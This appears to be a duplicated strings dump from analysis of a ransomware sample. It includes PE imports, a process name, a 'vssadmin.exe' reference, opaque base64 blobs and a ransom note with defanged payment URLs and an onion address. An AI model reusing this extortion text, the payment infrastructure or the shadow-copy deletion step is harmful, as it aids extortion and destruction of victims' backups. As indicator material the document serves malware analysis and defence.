HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

HTTP/1.

HTTP/1.

ntdll.dll

ntdll.dll

GetProcessHeap

GetProcessHeap

.text

.text

`.rdata

`.rdata

@.data

@.data

.reloc

.reloc

/`.rdBa

/`.rdBa

KERNEL32.DLL

KERNEL32.DLL

ADVAPI32.dll

ADVAPI32.dll

USER32.dll

USER32.dll

vcwuwa.exe_1980:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

SSSSh

SSSSh

PSSSSSSh

PSSSSSSh

SSSh`

SSSh`

SSShp

SSShp

operator

operator

GetProcessWindowStation

GetProcessWindowStation

.ttl { font-size:13px; color:880000; }

.ttl { font-size:13px; color:880000; }


More information about the encryption RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)


More information about the encryption RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)

but with our help, you can restore them.

How did this happen?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.

but with our help, you can restore them.

How did this happen?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.


All your files were encrypted with the public key, which has been


All your files were encrypted with the public key, which has been

only possible with the help of the private key and decrypt program,

only possible with the help of the private key and decrypt program,

for the specified time then the conditions for obtaining the private key will be changed.

for the specified time then the conditions for obtaining the private key will be changed.

1.hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S

1.hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S

2.hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

2.hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

3.hXXps://djdkduep62kz4nzx.onion.to/%S

3.hXXps://djdkduep62kz4nzx.onion.to/%S

1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en

1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en

3. Type in the address bar: djdkduep62kz4nzx.onion/%S

3. Type in the address bar: djdkduep62kz4nzx.onion/%S

4. Follow the instructions on the site.



IMPORTANT INFORMATION:

4. Follow the instructions on the site.



IMPORTANT INFORMATION:

Your Personal PAGES:
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S
hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

Your Personal PAGES:
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S
hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

hXXps://djdkduep62kz4nzx.onion.to/%S

hXXps://djdkduep62kz4nzx.onion.to/%S

Your Personal PAGE (using TOR): djdkduep62kz4nzx.onion/%S

Your Personal PAGE (using TOR): djdkduep62kz4nzx.onion/%S

Your personal code (if you open the site (or TOR 's) directly): %S

Your personal code (if you open the site (or TOR 's) directly): %S

More information about the encryption keys using RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)

More information about the encryption keys using RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)

Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.

Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.

All your files were encrypted with the public key, which has been transferred to your computer via the Internet.

All your files were encrypted with the public key, which has been transferred to your computer via the Internet.

Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.

Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.

Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.

1. hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S

1. hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S

2. hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

2. hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

3. hXXps://djdkduep62kz4nzx.onion.to/%S

3. hXXps://djdkduep62kz4nzx.onion.to/%S

1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en

1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en

3. Type in the address bar: djdkduep62kz4nzx.onion/%S

3. Type in the address bar: djdkduep62kz4nzx.onion/%S

IMPORTANT INFORMATION:

IMPORTANT INFORMATION:

hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S

hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S

hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

hXXp://dg62wor94m.sdsfg834mfuuw.com/%S

hXXps://djdkduep62kz4nzx.onion.to/%S

hXXps://djdkduep62kz4nzx.onion.to/%S

Your personal page (using TOR): djdkduep62kz4nzx.onion/%S

Your personal page (using TOR): djdkduep62kz4nzx.onion/%S

Your personal identification number (if you open the site (or TOR 's) directly): %S

Your personal identification number (if you open the site (or TOR 's) directly): %S

vssadmin.exe

vssadmin.exe

Qx9uDPyZvEAgViBD e/EWKBpxQ2Z9m==

Qx9uDPyZvEAgViBD e/EWKBpxQ2Z9m==

5LnS0bFGTpT9FURLf0fRPO1WWwR0Ew==

5LnS0bFGTpT9FURLf0fRPO1WWwR0Ew==

123123123123123

123123123123123

Ii5hRZexana6vDc3wWjuoDguUYP1lS6UNWDZiEC971geO2c4m72vPmtcYm13jhkcCieKkiejCEn5zwWrqZT/4yI ftp/vErZtcrVy/j00c57etbydmic0tVy8HbILtejYeG0dvgLDIuT0N0cXa1wxFAMh3WMyj2MWynch Wvq3TEjL7uBE/R7GWHM/LJtR1RCKGLlxvsctfzv 1T9znq9VymQodaWHQ9VLwedcvnuHhFP4Co3/3 Q/RhsrjoX8hmrYODDDASgLdHER0m HRg6ltLzyQ00U2xBemgBkY5RRtxrDMmP0uWKw6zaNcDopToeWpFr9ERdd Ox98jyz1rmSAXJYJ4WwdOUlcLr/0n3D0UkdBoUfAHEodZb/Pm0bmlyKpFz KXINh/GFOrINVsh0y3OCHc3dRujqC5aiquUzkfmJtXCokTS13M/mwBlyzJ4130U0YpAHfd5MisDELhaXDy2s0lGvwjuVUBV39EL8XO1M 1lfwCHG8i0fE3qbe4/AaMMTnElx7gX/a6ClWNB64A JTuowdbqVinHopwB5j1vjLtBdpsgjXHHh6qEpZiR4iSfhPgeialg Cd69wrZzIctiFGNoAOw wOk b2/YgqhS5uY8O5SI0FIJPMqc4P1yiT7oQHGWa KxNjLrgtghdNexmFaIBX7a6XPAifbnpM4846VSXR09rHqRXtnsJEf4wasi23rhmUAeRvOosS20XdyVQBogyeZOtlhUFoyfwEqEIULFw901Sq2gxc9bsqZnwHDliYG2z 32yfVrJXwmd0FfnBYxM1tg3fMBgexWbwNgN9qAfXOA6q9AvpZm1TqLs0UilYTLSt0kPNh16RHd w1iS7bXg4PmmjXKKUX9jieUpy aPRfgJl/LzCQQTrOXi4Nr9VJBkD7PYiHXhaKKFBKom2vKqadcGntDvd0Uycvszd6r4FbZX6U/bxJJxnnxN7iFtxKk8Kw3Y0v bIvygJ u1FWHqb5/oMPHUR5aZvGkgC1MwY3gSaDf1TreFtkPqD9UbPwNiim4aHhaM/dUANj6prdoO/NiwxZ033MqZ3mtVIEMNI3bZT2vAi oJhCwHiNh wgRVczszC CI32b0eWe8AQnTcqHzw2jI5GqacxOo7hXD67fy CivgDhXM1GQPZ9QMwDy3ET8Fq2dzsMljwu8 MLD025YnSr3D56syF9/8zK9AtvWN8aB80xVlxcHp90Q2YvbSi7pJdXThgpG2klUJr0QvMWz6nfIXyOYro2NHT4RI5Avh6FmT24ZqX3P8q78wlCyX/yEGsB5LJHuYisSLWVlSKmoRZjSl86 3/h/bVNMe2W OVUxCzxFneEpr5yabQ4wr2 3jaY05YuJurZymbJLq2PMPU PnWnaIBZWCBz6Zlhz9MQdb52aXTmovTYDaNUUvD Iy5QXbdR0mtzHKyRHjmpCacPNWVSoFI 0yMmL8Vg9RA8WlumMLCaQbALH9ZuLuia9bdHNpQlVrW1Q9mmshCIzBdQUkF2hnMvQOJFEMiGYYfDfJjAUilO9mfPfUZEqtxs2Ym3miFz8tUCsYSwH4W9VX0KmzPy0b ADLHgZPwjDGIgfTt8O0zWs9a5cISFTCPCkVupd0LLDOhNLSwT1a5A7ncUgYou3hHKPAQnJ ItTaFXBPOsDXYVFqB pOX/N1S1lBWoe8lXLSEUU2sAyIhxeS8FJWgk6bnF6NEopXjDBCIruIIq5WOFi8tcWrqvjYsI/zqqbJ5bKoY6DrnsY8nGH/rbE4Ta2BRSIXaATaQwVxXFZdF/mxxU xM3Brtxf8TZvFasWCbSJoAp/HSOsA5wW7M31CqAjaimlHVFStbq4HbpR tKtAaIm5ivaBeEc/0eNwV0LQbXC5a fwPhgKx1dvx3vgMHsvlpUv6LyEmi2QZDpQV2XvyBICqF9EFwz82Kvw9tg8WEJJp5X5bmlaVwTSL1/KFRp4 Pshv6fYBmHIUe 7lbZFYfJovWwr5b pKHSrdKMLAMuXs4C9YsE5aNa4p lL0XDfMim3mvH26XZs49 FwywcP9K5NKsoPwLD9QAOo3DEFa/3S5kYpR4x2evUk53J4ojoyOjH8PoPsJ6 PgEdv NOa8D3fgZSJiD318LCRJuI3sCDI/3Gh9L6YjNF7kSAcbxDTsvDzpVa366M6r1 a2nd4B/MffcawccndJ4kAvr7afR/TwyOpMvtTOb2c5njIC6tKzkg82U3SEYiWXtUjLjJA6W LWPMhojWiXprGYYcwvCQIweyMdnduCl2URytPUqC6sjO6XUVrZFsFn7ztEVexJ LII VBu2tsqZJZgx7VCPPOa3KsZhIZkCI7CKUaVGrhG/77enpUyMakp3lMJslYUb3DjzDEUd1Nz/1Mv9WAcgAWia9UvpsGbFrZJY8odWFqkBWgrapzmrVB5QE1C8elFvm FsLaUHaSKakVrlBldM8 WhiMCYfYj/u1AHsH2 LkZ11jI86pFWbJfrNvwQMGGkzYUeXw 3 S9 gQE8HPqydkWSr6OfTWx3CszuY51/Z4vw31ZWO86RLQTeA/uRCSzchgI32CsXHZpJ8u mWJMixCn5GbPfmd5PUhQXlp7pNJiaT3FWUB5X91CvZ7pCmiANUXF947F8yUEgEwwoGOXneND2aucS0NsyOkm7v3rL8sktntyfCfceFUjh07W/hvJ9KmG5dE6HoIU/T3Du6ht0kxzO1iSOPbWibassptg1VrhF5ICXzJHDu7Wa1Pr1u9Xa7Qct

Ii5hRZexana6vDc3wWjuoDguUYP1lS6UNWDZiEC971geO2c4m72vPmtcYm13jhkcCieKkiejCEn5zwWrqZT/4yI ftp/vErZtcrVy/j00c57etbydmic0tVy8HbILtejYeG0dvgLDIuT0N0cXa1wxFAMh3WMyj2MWynch Wvq3TEjL7uBE/R7GWHM/LJtR1RCKGLlxvsctfzv 1T9znq9VymQodaWHQ9VLwedcvnuHhFP4Co3/3 Q/RhsrjoX8hmrYODDDASgLdHER0m HRg6ltLzyQ00U2xBemgBkY5RRtxrDMmP0uWKw6zaNcDopToeWpFr9ERdd Ox98jyz1rmSAXJYJ4WwdOUlcLr/0n3D0UkdBoUfAHEodZb/Pm0bmlyKpFz KXINh/GFOrINVsh0y3OCHc3dRujqC5aiquUzkfmJtXCokTS13M/mwBlyzJ4130U0YpAHfd5MisDELhaXDy2s0lGvwjuVUBV39EL8XO1M 1lfwCHG8i0fE3qbe4/AaMMTnElx7gX/a6ClWNB64A JTuowdbqVinHopwB5j1vjLtBdpsgjXHHh6qEpZiR4iSfhPgeialg Cd69wrZzIctiFGNoAOw wOk b2/YgqhS5uY8O5SI0FIJPMqc4P1yiT7oQHGWa KxNjLrgtghdNexmFaIBX7a6XPAifbnpM4846VSXR09rHqRXtnsJEf4wasi23rhmUAeRvOosS20XdyVQBogyeZOtlhUFoyfwEqEIULFw901Sq2gxc9bsqZnwHDliYG2z 32yfVrJXwmd0FfnBYxM1tg3fMBgexWbwNgN9qAfXOA6q9AvpZm1TqLs0UilYTLSt0kPNh16RHd w1iS7bXg4PmmjXKKUX9jieUpy aPRfgJl/LzCQQTrOXi4Nr9VJBkD7PYiHXhaKKFBKom2vKqadcGntDvd0Uycvszd6r4FbZX6U/bxJJxnnxN7iFtxKk8Kw3Y0v bIvygJ u1FWHqb5/oMPHUR5aZvGkgC1MwY3gSaDf1TreFtkPqD9UbPwNiim4aHhaM/dUANj6prdoO/NiwxZ033MqZ3mtVIEMNI3bZT2vAi oJhCwHiNh wgRVczszC CI32b0eWe8AQnTcqHzw2jI5GqacxOo7hXD67fy CivgDhXM1GQPZ9QMwDy3ET8Fq2dzsMljwu8 MLD025YnSr3D56syF9/8zK9AtvWN8aB80xVlxcHp90Q2YvbSi7pJdXThgpG2klUJr0QvMWz6nfIXyOYro2NHT4RI5Avh6FmT24ZqX3P8q78wlCyX/yEGsB5LJHuYisSLWVlSKmoRZjSl86 3/h/bVNMe2W OVUxCzxFneEpr5yabQ4wr2 3jaY05YuJurZymbJLq2PMPU PnWnaIBZWCBz6Zlhz9MQdb52aXTmovTYDaNUUvD Iy5QXbdR0mtzHKyRHjmpCacPNWVSoFI 0yMmL8Vg9RA8WlumMLCaQbALH9ZuLuia9bdHNpQlVrW1Q9mmshCIzBdQUkF2hnMvQOJFEMiGYYfDfJjAUilO9mfPfUZEqtxs2Ym3miFz8tUCsYSwH4W9VX0KmzPy0b ADLHgZPwjDGIgfTt8O0zWs9a5cISFTCPCkVupd0LLDOhNLSwT1a5A7ncUgYou3hHKPAQnJ ItTaFXBPOsDXYVFqB pOX/N1S1lBWoe8lXLSEUU2sAyIhxeS8FJWgk6bnF6NEopXjDBCIruIIq5WOFi8tcWrqvjYsI/zqqbJ5bKoY6DrnsY8nGH/rbE4Ta2BRSIXaATaQwVxXFZdF/mxxU xM3Brtxf8TZvFasWCbSJoAp/HSOsA5wW7M31CqAjaimlHVFStbq4HbpR tKtAaIm5ivaBeEc/0eNwV0LQbXC5a fwPhgKx1dvx3vgMHsvlpUv6LyEmi2QZDpQV2XvyBICqF9EFwz82Kvw9tg8WEJJp5X5bmlaVwTSL1/KFRp4 Pshv6fYBmHIUe 7lbZFYfJovWwr5b pKHSrdKMLAMuXs4C9YsE5aNa4p lL0XDfMim3mvH26XZs49 FwywcP9K5NKsoPwLD9QAOo3DEFa/3S5kYpR4x2evUk53J4ojoyOjH8PoPsJ6 PgEdv NOa8D3fgZSJiD318LCRJuI3sCDI/3Gh9L6YjNF7kSAcbxDTsvDzpVa366M6r1 a2nd4B/MffcawccndJ4kAvr7afR/TwyOpMvtTOb2c5njIC6tKzkg82U3SEYiWXtUjLjJA6W LWPMhojWiXprGYYcwvCQIweyMdnduCl2URytPUqC6sjO6XUVrZFsFn7ztEVexJ LII VBu2tsqZJZgx7VCPPOa3KsZhIZkCI7CKUaVGrhG/77enpUyMakp3lMJslYUb3DjzDEUd1Nz/1Mv9WAcgAWia9UvpsGbFrZJY8odWFqkBWgrapzmrVB5QE1C8elFvm FsLaUHaSKakVrlBldM8 WhiMCYfYj/u1AHsH2 LkZ11jI86pFWbJfrNvwQMGGkzYUeXw 3 S9 gQE8HPqydkWSr6OfTWx3CszuY51/Z4vw31ZWO86RLQTeA/uRCSzchgI32CsXHZpJ8u mWJMixCn5GbPfmd5PUhQXlp7pNJiaT3FWUB5X91CvZ7pCmiANUXF947F8yUEgEwwoGOXneND2aucS0NsyOkm7v3rL8sktntyfCfceFUjh07W/hvJ9KmG5dE6HoIU/T3Du6ht0kxzO1iSOPbWibassptg1VrhF5ICXzJHDu7Wa1Pr1u9Xa7Qct

ki1kjLOF6ftBUU19FD4OQIicg6YgwfBdPBhJO1hoPvrmErVpzoBRGINKi5fpWV31x8eW5uRQ4F2hiQEsF2XdF 26jwpl/zT2XrUcyUHWoxmtS9WZcY3mVDROnulMneGgcYPevvW8d15DXGTHsU8CPCmXB2OwRCKUNknuYdxU9wWcwooDXIqsvrcIAOwCjFtt2Or0nCqkeRtXXfM vQPBmoFRmP2L8mwtXDeGONhvCJohPiSmvRIpaw2ytrxrJ K4bUckAfbFC5C2XrtSM0wB0x5g77FIJH/g2uEJ9 JF2BjFDrrNnJP dNxws qWMyuKl1YkChWHcLCnAPCPOPfew7wFACl0VtgPv688lrZhFWr8QbIP8rj3NpUpJXG QIJWpXTXhrjciAJBZwn6Zyi37DwLfkznXL pQWFZkXy99pzR1hd11NXYKAiY9gzqk4ztIF7zNGXXxFe5qBMEfUm3FQd/M5WQpxHh1iqCgKBl0LkQtUxgr152VbWjw7m2FcZv8xZkNZEOSsGSy9t5yXY TXvuWiOwogOt0TVvlYXl9b0WoJz00f29mcdB1g1OmJ MFQmUcejr8UH1MAD6DhB7dzP4QTdpIzUNr1gInS9de4UKv2Jt2NOP5l0Wrg3aC39w7lVVZZ53FLMBFLvJeHC8KO9YeH5Bkh3bWlSvIeBt eNJDOszwmER2DNuLhtDGiAWdSSbPziTiR8h8UPxNoHvmLyKLjx5g7oyL1koQGekPZHZ0b1FehJwwRNrevCB7xZstRVgE3Qs2NRUAZZeGI2 F5yckcA12MrqtKYHS6ParB0lVWyb xOC1DPeGPY2Xig1uAEIVIeKBGHM VCI6mvSc75zEgeOnf8EN3sNEi WHJL6Ah4iJKLEmrrn54 wbkqTTP6aqgcdAs0S32owKAOir9nHoxYJCCuMeBID2FFyxyxcLATcMYOWXLilOXbqjv36s 4iqVPc3Y8z2KJ3Ollff4qtgriRbYUM/lenW1PAxcLSOLKtwzBCSXWceWuawMLxDj7YRwTVg8133qZho6Ofpt/uZm1cDOE08QJJBMI g/OIxi3iO6T2gAE4bWDi47eWoldBX wSFk qXo98aAGgybUpB/QW6bxwQr0Fp/xCrjbf8LLaR6d2ph9oClpAqwtY4KMOG7jh/gvbWPVYCX3r4dKu/nhBPhg9NAI77uZ4VmmhYMuGc4LHjGGX3kQnjsKSdEtcdivbQAsU1sA2mlfKvsIifCgsLUy I46b4x90hYJYR6tz8ElTS0nusYSCfqx56yNdC3C0w0XwGcrEnzNyYq2iNnUkZbqKSMfftS16F2S8FsWP8rKkPx750CVjwXzvlwPwOGu8fonSu3tMd4n1m6p2tgS/Ojy01Ne9ve7g mHCsywJey9MKKFI6LSdrbL3usW334aLm27Wro AK7mjPtuCFRS4nbA2DNxCSr1RCA0S2spAB53tj0pI0Daoq7rLx5tcGpz8wZv4rMEAEyaQqu3oADPIEkAadX9jy2Iu6IE2YfFA/jirwos 2rMnMC hgfHYHjJjDFu9B3fXld4Cc1tVpTn8oZZ7Omg/i9rWDvoj4JVHBQi1OO251IZKY9SxIQurBItmrCq0d2Unl3JEejw2PyZs2Lge7imepLNbbvM2GvWiQpMUORLfOgKolahM4tza3uXo69Jk83LTj9grgb0HcKR2cBdWw02TRIqf3BRa0OdlJ3DNS07jQjyLrDEyv68TNGAojVD0QZLW87bcq7dORrvzM/8Fazil6qSGuOM3xdRtJNEitbr1j3VQ3TpH9QOtSZsz aEP/vh0YCu4scUASEAolGN9u8CCIvvEQxbdz3E Nef7yeiKMWnkXLBXAeylqj68KhCvrLTSChzMSpokNDEDSUcO60KVnNy33EvuJu8B1zxugO0IkAwL9TpptRgdkuxhAeE njJQCw1bUrXnVJc5LD5KUff8WhPAK2f32C5vHxeddWPkqF7lV0vM29DLIozceUOA468gjxQiD6ydbTjeqsZRp3vs1Cl3xjs78ySSKLoGuEvF0ed5FSbq2WLBDvytsdfnmDnZ6vAu7zSlto8uqzCYaqKi6jnOmhsztaUiuTu21Ae/JG0qeOrUmO37bf6O/6wDhthgsQD2XmdfPs0fLEVOrAP8RIEKoYS/8Vjs/NJQ9cXkdPvcaVgw5ykzB9eABMEMisewO0u/Z5D9OKehYGHJ0FIMppAXW5Mv0agtTRY5YrBd5Q8rLW fpTxwhAmTfwOIzFII56EWrTbc40 hvKjJpnVpDdnPqIy0naQsRqCl tY wsowHzPNoJM8XbuWSyPjBXRV9udy6drkMMXiPKx8tO vTtNZC1ixezFh77HGr/p 808zptHtBNY4PMtHVSZqy5MndOGYyNgMuxheA0Cz0F38y I4SLFI6Be28pMtDNG15Pj4Q th41nSohB7NmOl/qAZJTIR1YKwSpmQvs/xnkzg8jPIt0BwxIYqkCfdTrvUopBIkzftSrMW91YqUu7EP7hb3JTEpsA2 3nSK2j4d9Ts33C5Sk8P1KrOxbpBf7zt4Uo0gTrxTreo/vqazpJNNa8Px45QCG9n72FCecxcmYERz6OqzQX5 tbga7 sBLWW1lvaxK97T4 Z87zdUpGcxT2jiKVG4F7NmI pNZB5UwYJrnaDTPPtJDdLQgJT9JoMEHLYuljWDpRzNf0v3V99J90vt7VsK/ohkipDWieMHbUzE48 6XSI D2IhAaNJkRJb5zq18IxyrW9hIOwJkfbIqq/7FpbC6pUQypnjwF8CkbK4DcWs65CvfRlc7ry/oJbINCpi7qNh7Nwq4YcQlWDtZTYSJ5aVR0jg4yftMTqjiJ5/Umto/WDO8OO0eWWy7GRZ26jKSrMuKnINpBIiuRw/WrWlXdKiayMKBI7AebWNh0/0IvkbRnww96SmbcyW/qdL VMuMW9/Dm9l2oFiNoSa0jWGUONgtyCdITzjq7aY4KuAqr9QwFmXpjFRRPfPjD3d0T8JkLyMET/0h0XSzYSMrhfcflp1VAJ98a B89n/tdKNZGzfjaiL4WzPERDvO6L6unekgvemq vmV07IzVEHo7nKNU4SG5pJpYU/HHpm3rl5PblmSvVR2iZElreEffOV2vJMR7RtHDRnYaQl NVn8VI2//qI62/sa5Mv4a1IbF03V/AJA11UTKk2TbghJpiFOCYafOIQNKDorhpm4nPF75tvfDzN3dZvjoxCDTZI9oiSFRVkN1ozGe/KptutADFIlDbEKbjtT3Vnuh9eUx1XP/8y9kaCC0wbWD1mVcdbNxlpEqqwgQzIMmZXrdUfv5uRPGBEX2aj6adT9wl5cGi9V7WHCweEhUdSEgIkNjBhVLiEaO0JeZ6PzPB4sJFdGDoMB67b0b1hEGnmumRmMo4f69pXYEcBjp/ergorvIzpyXsG1ez0LtaGSj95S6Dg2NQW1TQRoIvQXsDGGsqOhNn01NAfmiNtbq27QD2Z9cZ/QNZt BZ0wVrWf4 BkdHtpo3JV5qq3F8TOh3bziaO42pZP bI5uQRQQfjrnbnoRP9x75yMqn8XIs4tOC7wA9WCJt5qaHRex7pIxUiQvWVZyU6S1vatTqxwmMwwzkuZ3Qt6ccmmf3SVMsMSIJCYAjU5sd0D1ImchzdPsegz2FKzLv0AOns2BTCfJFIrJc/xKaxGDAU7hwUf0VKhJiRRlttQ8gGo6Z7EANwiWmKTPPkbaU9661sy1Rpc87gOvFhKjpwRakETjQt10rgaeYd3CjZODl97x WspMErmucdkoZTpV7cRdxgiPwfQseCgJaSPQjmF9l8wpp/R4vQxuOGtBvZzqNXA8atNVHfoNgK1CI/nVzZChp6Xffpqnp3ICtlgOTvp1myb40qZGbyCbRR/m39IAmt2S4HvWx/wxCtIjxAB5aKPHWd0lmBl7nWXJASCAXO8bhx4nNIoX9aSo9XRV0QQUuhUtS122Ny2A2cw163xF3BvE/99vitwQ/Mi42Q4gQ940DYtb9ZN9aYiM3qT3tlSncywJ8TPSnzGEtnCO7CLX8t102iJxlLlz3JCm2YN TKcbejweZS7WYshCA0OpTee60PojcbiRNvLXAbJyxIrvOlhKIu2SyltQ23xQP6irlrCKRXDdMuixJXHT2TxKOHK/Al6OZi8v31DqZd3Ix2qi dfxtE/7HJj/8LNjhuLVVFu/jUy3 JEz14jgBWHXBYcNDaKLEip THy64RwnMdFqfxUHvKmq7r4Vm/XoTVC2DbVyK/DvkrRoZa9QxlF4CEGfyg/Fjh5XTV0S8skFE0ycLCwXTDg7tmWGYTSpBda63hXKLsMYjQk4nhI9o41Z3SBZGEwvGEm Emhww4FEV53mJJ9OheidfMr6jAR0JLTXAzrd78zwIqBm4BMY2htIcfbJCK9yiBWEYJ27PfKpuKo/hgieh4uIbs2gtIic1ND33oDGmcnL3is7v/zW JV jL7ZHjtNxVS7aICe O5N3LFj/nvbjsEyJqQAs5wiR1AiiIJlbawL4UoKH/1r2uKsBLyqixAgARrePzAXnl046IddKMr9vm1UFb6XQjDhyGxco MVJyDZLvVG8RYsqVjzUknX/TumH/IyBcvTcTsHXEFaBRMBaJUs9wFYDdCOfyhDRpUO1K3xdrSKOFpGWDoz4GERNyscdrCQ84kkeWZzx1i25 1YkmC4SMDNdhM4DyMO6aGUoNjaZ/PuGNdvcloBaI9HBewCu8UYWKc2COXo6cDWHHsSkKPVlgmX2Oth9LMFeMpQbnFr7f2LXQ3anmGs NmjG3TWL k1M5ZqOvQt5QSTY4Td1RaZqIIs0A0zHFmsGwGJVEJo03qMV0u7GfWVAqDmWsMfmqH1ul7rPIqxi cEfOq37oiCYskRQL0XOFo/ceMtQX1Riyt2eK7SSOp79FJXZXDivw8u51dBShLD2G47YGWF9ZYvRmtglABo3Zc1ibTq6Wl0gexl2afz GbFVxC7lMgXf5vWEB0Mj4XZoPkIs4ddaiMW1cr7S6Vc05Vn1DoqPdPenyLI nrbJpXOFEoN2wte7h==

ki1kjLOF6ftBUU19FD4OQIicg6YgwfBdPBhJO1hoPvrmErVpzoBRGINKi5fpWV31x8eW5uRQ4F2hiQEsF2XdF 26jwpl/zT2XrUcyUHWoxmtS9WZcY3mVDROnulMneGgcYPevvW8d15DXGTHsU8CPCmXB2OwRCKUNknuYdxU9wWcwooDXIqsvrcIAOwCjFtt2Or0nCqkeRtXXfM vQPBmoFRmP2L8mwtXDeGONhvCJohPiSmvRIpaw2ytrxrJ K4bUckAfbFC5C2XrtSM0wB0x5g77FIJH/g2uEJ9 JF2BjFDrrNnJP dNxws qWMyuKl1YkChWHcLCnAPCPOPfew7wFACl0VtgPv688lrZhFWr8QbIP8rj3NpUpJXG QIJWpXTXhrjciAJBZwn6Zyi37DwLfkznXL pQWFZkXy99pzR1hd11NXYKAiY9gzqk4ztIF7zNGXXxFe5qBMEfUm3FQd/M5WQpxHh1iqCgKBl0LkQtUxgr152VbWjw7m2FcZv8xZkNZEOSsGSy9t5yXY TXvuWiOwogOt0TVvlYXl9b0WoJz00f29mcdB1g1OmJ MFQmUcejr8UH1MAD6DhB7dzP4QTdpIzUNr1gInS9de4UKv2Jt2NOP5l0Wrg3aC39w7lVVZZ53FLMBFLvJeHC8KO9YeH5Bkh3bWlSvIeBt eNJDOszwmER2DNuLhtDGiAWdSSbPziTiR8h8UPxNoHvmLyKLjx5g7oyL1koQGekPZHZ0b1FehJwwRNrevCB7xZstRVgE3Qs2NRUAZZeGI2 F5yckcA12MrqtKYHS6ParB0lVWyb xOC1DPeGPY2Xig1uAEIVIeKBGHM VCI6mvSc75zEgeOnf8EN3sNEi WHJL6Ah4iJKLEmrrn54 wbkqTTP6aqgcdAs0S32owKAOir9nHoxYJCCuMeBID2FFyxyxcLATcMYOWXLilOXbqjv36s 4iqVPc3Y8z2KJ3Ollff4qtgriRbYUM/lenW1PAxcLSOLKtwzBCSXWceWuawMLxDj7YRwTVg8133qZho6Ofpt/uZm1cDOE08QJJBMI g/OIxi3iO6T2gAE4bWDi47eWoldBX wSFk qXo98aAGgybUpB/QW6bxwQr0Fp/xCrjbf8LLaR6d2ph9oClpAqwtY4KMOG7jh/gvbWPVYCX3r4dKu/nhBPhg9NAI77uZ4VmmhYMuGc4LHjGGX3kQnjsKSdEtcdivbQAsU1sA2mlfKvsIifCgsLUy I46b4x90hYJYR6tz8ElTS0nusYSCfqx56yNdC3C0w0XwGcrEnzNyYq2iNnUkZbqKSMfftS16F2S8FsWP8rKkPx750CVjwXzvlwPwOGu8fonSu3tMd4n1m6p2tgS/Ojy01Ne9ve7g mHCsywJey9MKKFI6LSdrbL3usW334aLm27Wro AK7mjPtuCFRS4nbA2DNxCSr1RCA0S2spAB53tj0pI0Daoq7rLx5tcGpz8wZv4rMEAEyaQqu3oADPIEkAadX9jy2Iu6IE2YfFA/jirwos 2rMnMC hgfHYHjJjDFu9B3fXld4Cc1tVpTn8oZZ7Omg/i9rWDvoj4JVHBQi1OO251IZKY9SxIQurBItmrCq0d2Unl3JEejw2PyZs2Lge7imepLNbbvM2GvWiQpMUORLfOgKolahM4tza3uXo69Jk83LTj9grgb0HcKR2cBdWw02TRIqf3BRa0OdlJ3DNS07jQjyLrDEyv68TNGAojVD0QZLW87bcq7dORrvzM/8Fazil6qSGuOM3xdRtJNEitbr1j3VQ3TpH9QOtSZsz aEP/vh0YCu4scUASEAolGN9u8CCIvvEQxbdz3E Nef7yeiKMWnkXLBXAeylqj68KhCvrLTSChzMSpokNDEDSUcO60KVnNy33EvuJu8B1zxugO0IkAwL9TpptRgdkuxhAeE njJQCw1bUrXnVJc5LD5KUff8WhPAK2f32C5vHxeddWPkqF7lV0vM29DLIozceUOA468gjxQiD6ydbTjeqsZRp3vs1Cl3xjs78ySSKLoGuEvF0ed5FSbq2WLBDvytsdfnmDnZ6vAu7zSlto8uqzCYaqKi6jnOmhsztaUiuTu21Ae/JG0qeOrUmO37bf6O/6wDhthgsQD2XmdfPs0fLEVOrAP8RIEKoYS/8Vjs/NJQ9cXkdPvcaVgw5ykzB9eABMEMisewO0u/Z5D9OKehYGHJ0FIMppAXW5Mv0agtTRY5YrBd5Q8rLW fpTxwhAmTfwOIzFII56EWrTbc40 hvKjJpnVpDdnPqIy0naQsRqCl tY wsowHzPNoJM8XbuWSyPjBXRV9udy6drkMMXiPKx8tO vTtNZC1ixezFh77HGr/p 808zptHtBNY4PMtHVSZqy5MndOGYyNgMuxheA0Cz0F38y I4SLFI6Be28pMtDNG15Pj4Q th41nSohB7NmOl/qAZJTIR1YKwSpmQvs/xnkzg8jPIt0BwxIYqkCfdTrvUopBIkzftSrMW91YqUu7EP7hb3JTEpsA2 3nSK2j4d9Ts33C5Sk8P1KrOxbpBf7zt4Uo0gTrxTreo/vqazpJNNa8Px45QCG9n72FCecxcmYERz6OqzQX5 tbga7 sBLWW1lvaxK97T4 Z87zdUpGcxT2jiKVG4F7NmI 